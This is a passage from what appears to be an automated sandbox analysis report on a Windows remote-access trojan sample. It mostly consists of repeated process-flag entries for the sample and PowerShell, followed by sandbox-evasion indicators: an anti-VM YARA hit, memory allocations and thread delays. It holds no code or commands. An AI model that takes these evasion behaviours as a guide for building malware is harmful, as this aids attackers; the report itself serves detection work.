            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 870000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: C20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 84A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 94A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 9690000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: A690000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMemory allocated: 49C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598704Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598579Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598336Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeThread delayed: delay time: 597110Jump to behavior
